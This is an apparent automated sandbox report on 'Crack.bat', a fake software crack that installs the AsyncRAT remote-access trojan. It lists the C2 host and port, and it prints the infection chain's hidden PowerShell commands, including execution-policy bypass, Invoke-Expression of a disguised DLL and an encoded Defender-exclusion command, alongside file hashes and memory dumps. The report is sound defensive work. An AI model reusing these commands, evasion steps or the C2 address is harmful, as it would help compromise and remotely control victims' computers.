Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    500s
  • max time network
    599s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25/01/2025, 10:42

General

  • Target

    lossless scaling/Registration ('Crack')/Crack.bat

  • Size

    14KB

  • MD5

    8bfba49d351559387e43cb66ffeaafc1

  • SHA1

    2a237525a6d906e264b36bb11bdd2d6b997b0a64

  • SHA256

    6be519bd1dcfbfcf4d192d1b8df90434f3fad30792cc817ace43bbec5314f232

  • SHA512

    5ff2536f48dea56d6f1b736875ce88858bd6c4b4b68ae89ce9690b11f9983b4b41882757c6f8f4615e84c1bf782550c82fad1136779d076d198b7360dfdef41a

  • SSDEEP

    384:re23N2+xMcYjLnGHXZYGJ+SbnnGxJ46QLGpbQusYrMTVOJwC9hc+tmsWSYd5Ajdn:re23N2+xMcYjTGHXZYGJ+SbnnGxJ46QC

Malware Config

Extracted

Family

asyncrat

Version

A 14

Botnet

Default

C2

3x3.casacam.net:303

Mutex

MaterxMutex_Egypt2

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 6 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Registration ('Crack')\Crack.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4580
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:504
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4228
      • C:\Windows\system32\xcopy.exe
        xcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Registration ('Crack')\\Data\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I /Y
        2⤵
          PID:5040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"
          2⤵
          • UAC bypass
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:564
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /query /tn administrator
            3⤵
              PID:4916
            • C:\Users\Public\IObitUnlocker\RAR.exe
              "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
              3⤵
              • Executes dropped EXE
              PID:1428
            • C:\Users\Public\IObitUnlocker\BR\Font.exe
              "C:\Users\Public\IObitUnlocker\BR\Font.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2712
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe
                "C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1396
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1948
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:748
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:660
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                    6⤵
                      PID:4100
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      6⤵
                        PID:468
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        6⤵
                          PID:2784
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                          6⤵
                            PID:4272
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                            6⤵
                              PID:240
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"' & exit
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:1592
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"'
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:4052
                                • C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe
                                  "C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4208
                      • C:\Windows\system32\schtasks.exe
                        "C:\Windows\system32\schtasks.exe" /query /tn administrator
                        3⤵
                          PID:1556
                      • C:\Windows\system32\mode.com
                        mode con: cols=80 lines=10
                        2⤵
                          PID:3764
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUA
                        1⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1572
                      • C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:792
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1148
                      • C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        1⤵
                        • Executes dropped EXE
                        PID:3780

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Certificate.exe.log

                        Filesize

                        838B

                        MD5

                        b2a93166280809b9da482126a28346f6

                        SHA1

                        13705957ad74170698714cc84624196176610f14

                        SHA256

                        d309ddf505140ba12b7ce857aa7e822f24523b86774d423bf1d74c0cf13ff63d

                        SHA512

                        924f31c62f16074ebce62227b417b5ba038cbb54f39390a722e2f934c939eed4b47e2d8dcc87727337d8ddef70466be905cd2e94b386a91ab1ff35b86f9c96fb

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        3KB

                        MD5

                        22e796539d05c5390c21787da1fb4c2b

                        SHA1

                        55320ebdedd3069b2aaf1a258462600d9ef53a58

                        SHA256

                        7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92

                        SHA512

                        d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        525f62941b065f72297568ad6edefdef

                        SHA1

                        91e926c5a83233362ed0bf20f3eeab16eacde3bd

                        SHA256

                        a145dfb88362c371dbf3b79a6d2fb79096f850b64820524bece543f208068aad

                        SHA512

                        82eb0c1d2384a952f3400544115b9e120f3727113dfdaf3f0cc3c932bc4fa8b7df9f02a5191955419dd29d6420ee10356e468c3b4b2a267198681d791b8c8e41

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        15KB

                        MD5

                        793c849c1b27be16abbb55235f84f5f3

                        SHA1

                        55d83f019df94912977b9222a0546d350c0f7ef6

                        SHA256

                        3a2340721918ae899133a6ffee924013513944986e8d404ea90df48bd7d0252e

                        SHA512

                        d0cc41017e57adfc7bb6c04951eee979d4a02f3ef99c35cac0b26963d91d5686e0e6c3d116fa1c56a8e6bc17cff37193e9b3731af2779ec916f0da07711a0067

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        b72ce05166195fb5b735f51362a8e032

                        SHA1

                        1ac77d57edfe9cb32d156e53da1e8109acfca013

                        SHA256

                        5bfa189d95c903200d92d51d2bcb555a19612916a8437a948f7a6ae487bc0112

                        SHA512

                        f9dfb1775981ece4ef2654834725eeb84a74f6c0e3a5ed2191a23b4b22b1a35a03ad2df3e09ebe4fdf455d54970f705474a8ee84c9be39f0e8c2c54aa66a112e

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe

                        Filesize

                        156KB

                        MD5

                        6981d94fbcc31ca50551300f5b4a96a3

                        SHA1

                        e38b3a74f2951f5480fb67acc75d41f3e2b4f70e

                        SHA256

                        8c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811

                        SHA512

                        b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_32nxfver.vbs.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe

                        Filesize

                        628KB

                        MD5

                        1d53f5a867dd69486834f81a7a490a2d

                        SHA1

                        4154fe5c8e4b1a6141c8ea21b9f1a13ed7a4d91c

                        SHA256

                        f804e0bf63f75b3a11c182054a8f02d4f9d2fb182c3a49b105dece388d8d06a1

                        SHA512

                        769c1e9d9ab34bbd6ff3a0ee06d8e21a64e47861712bf92644a7f9f8d1b035dcf148a6d5d92da16ed82c720b0366e26fb93a0fef91e12a70c1790514bf2fe5c1

                      • C:\Users\Public\IObitUnlocker\BR\Font.exe

                        Filesize

                        434KB

                        MD5

                        68c9ee084cc409309b116ec6aea890a8

                        SHA1

                        efd6aab18a08a63b146ad587d1fa08e0bb19bebc

                        SHA256

                        ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d

                        SHA512

                        9809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25

                      • C:\Users\Public\IObitUnlocker\EN.dll

                        Filesize

                        181KB

                        MD5

                        a435e2fb659a3596b017f556b53fa09d

                        SHA1

                        c9ab6229bf239edac73593e0ffb53c1d9bb21686

                        SHA256

                        e7f03b61cff5526877ea3f26f613caf5dbdf9006d49b98c906de3051067d7512

                        SHA512

                        aa3fa16420e66bcdff349ba66791d7849a67d2ae720fdca4b3674ce2a8bffd7a1caae1a306c6533446950b0f8798d6cf7e37ec78ea199252028870fbc742f495

                      • C:\Users\Public\IObitUnlocker\Loader.vbs

                        Filesize

                        308B

                        MD5

                        2993b76e0b0ba015caf654881638a0c0

                        SHA1

                        7fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd

                        SHA256

                        0e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3

                        SHA512

                        a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb

                      • C:\Users\Public\IObitUnlocker\RAR.exe

                        Filesize

                        629KB

                        MD5

                        d3e9f98155c0faab869ccc74fb5e8a1e

                        SHA1

                        8e4feaad1d43306fdd8aa66efa443bca7afde710

                        SHA256

                        3e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b

                        SHA512

                        2760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d

                      • C:\Users\Public\IObitUnlocker\Report.ps1

                        Filesize

                        457KB

                        MD5

                        dd3f962ccc2f5b5f34700307e35138f8

                        SHA1

                        90d80df0ef716260a7d4ed466cf40caf966f0969

                        SHA256

                        e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb

                        SHA512

                        619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae

                      • C:\Users\Public\IObitUnlocker\UK.dll

                        Filesize

                        5KB

                        MD5

                        3fffc04611766c3d49b9f0b74752a2b5

                        SHA1

                        c70e6e3b2cd315e900f6dfdd5828cbf75b903fe5

                        SHA256

                        7537dd03a875384bc79a7a21811e06ca97de3571631fc20b4b86b26baaafad9d

                        SHA512

                        3ded3c5712f93eaa75fc9fe9469a02ece5996b6574d63b7b3a5db86db74762631e35aacae519ea3d23862bdaffab5e786696eeb812b0d1ce7f14b78f4539b4d8

                      • memory/564-47-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/564-18-0x00007FFF1D2C3000-0x00007FFF1D2C5000-memory.dmp

                        Filesize

                        8KB

                      • memory/564-32-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/564-30-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/564-29-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/564-28-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/564-27-0x0000020479FF0000-0x000002047A012000-memory.dmp

                        Filesize

                        136KB

                      • memory/660-84-0x0000000000400000-0x0000000000416000-memory.dmp

                        Filesize

                        88KB

                      • memory/660-93-0x0000000007850000-0x000000000785C000-memory.dmp

                        Filesize

                        48KB

                      • memory/660-92-0x00000000076C0000-0x00000000076DE000-memory.dmp

                        Filesize

                        120KB

                      • memory/660-91-0x00000000075D0000-0x00000000075DE000-memory.dmp

                        Filesize

                        56KB

                      • memory/660-90-0x0000000007640000-0x00000000076B6000-memory.dmp

                        Filesize

                        472KB

                      • memory/660-89-0x0000000006CF0000-0x0000000006D56000-memory.dmp

                        Filesize

                        408KB

                      • memory/748-83-0x000001FEDBE60000-0x000001FEDBE6A000-memory.dmp

                        Filesize

                        40KB

                      • memory/1396-80-0x00000000011E0000-0x00000000011E8000-memory.dmp

                        Filesize

                        32KB

                      • memory/1396-82-0x0000000001230000-0x0000000001236000-memory.dmp

                        Filesize

                        24KB

                      • memory/1396-81-0x000000001CFE0000-0x000000001D02C000-memory.dmp

                        Filesize

                        304KB

                      • memory/1396-79-0x000000001CD80000-0x000000001CE1C000-memory.dmp

                        Filesize

                        624KB

                      • memory/1396-78-0x000000001C810000-0x000000001CCDE000-memory.dmp

                        Filesize

                        4.8MB

                      • memory/1396-77-0x000000001C290000-0x000000001C336000-memory.dmp

                        Filesize

                        664KB

                      • memory/2712-63-0x0000000005480000-0x000000000548A000-memory.dmp

                        Filesize

                        40KB

                      • memory/2712-64-0x0000000005700000-0x0000000005756000-memory.dmp

                        Filesize

                        344KB

                      • memory/2712-52-0x0000000005500000-0x0000000005592000-memory.dmp

                        Filesize

                        584KB

                      • memory/2712-51-0x0000000005A10000-0x0000000005FB6000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/2712-48-0x0000000000A00000-0x0000000000A72000-memory.dmp

                        Filesize

                        456KB

                      • memory/2712-49-0x00000000053B0000-0x000000000544C000-memory.dmp

                        Filesize

                        624KB

                      • memory/4052-109-0x0000000005C00000-0x0000000005C1E000-memory.dmp

                        Filesize

                        120KB

                      • memory/4052-107-0x0000000005760000-0x0000000005AB7000-memory.dmp

                        Filesize

                        3.3MB

                      • memory/4052-103-0x0000000004FE0000-0x0000000005046000-memory.dmp

                        Filesize

                        408KB

                      • memory/4052-110-0x0000000005C20000-0x0000000005C6C000-memory.dmp

                        Filesize

                        304KB

                      • memory/4052-111-0x0000000006160000-0x00000000061F6000-memory.dmp

                        Filesize

                        600KB

                      • memory/4052-112-0x00000000060E0000-0x00000000060FA000-memory.dmp

                        Filesize

                        104KB

                      • memory/4052-113-0x0000000006130000-0x0000000006152000-memory.dmp

                        Filesize

                        136KB

                      • memory/4052-99-0x0000000004F40000-0x0000000004F62000-memory.dmp

                        Filesize

                        136KB

                      • memory/4052-95-0x0000000002400000-0x0000000002436000-memory.dmp

                        Filesize

                        216KB

                      • memory/4052-96-0x00000000050C0000-0x00000000056EA000-memory.dmp

                        Filesize

                        6.2MB

                      • memory/4208-153-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-141-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-179-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-178-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-175-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-171-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-169-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-167-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-165-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-163-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-161-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-157-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-155-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-120-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-151-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-149-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-147-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-145-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-143-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-181-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-139-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-137-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-133-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-131-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-129-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-127-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-125-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-123-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-121-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-173-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-159-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-135-0x00000230FAB60000-0x00000230FAC54000-memory.dmp

                        Filesize

                        976KB

                      • memory/4208-2724-0x00000230E22D0000-0x00000230E2326000-memory.dmp

                        Filesize

                        344KB

                      • memory/4208-2725-0x00000230FAD10000-0x00000230FAD5C000-memory.dmp

                        Filesize

                        304KB

                      • memory/4208-2726-0x00000230FB710000-0x00000230FB764000-memory.dmp

                        Filesize

                        336KB

                      • memory/4208-119-0x00000230FAB60000-0x00000230FAC58000-memory.dmp

                        Filesize

                        992KB

                      • memory/4208-118-0x00000230E0650000-0x00000230E06F2000-memory.dmp

                        Filesize

                        648KB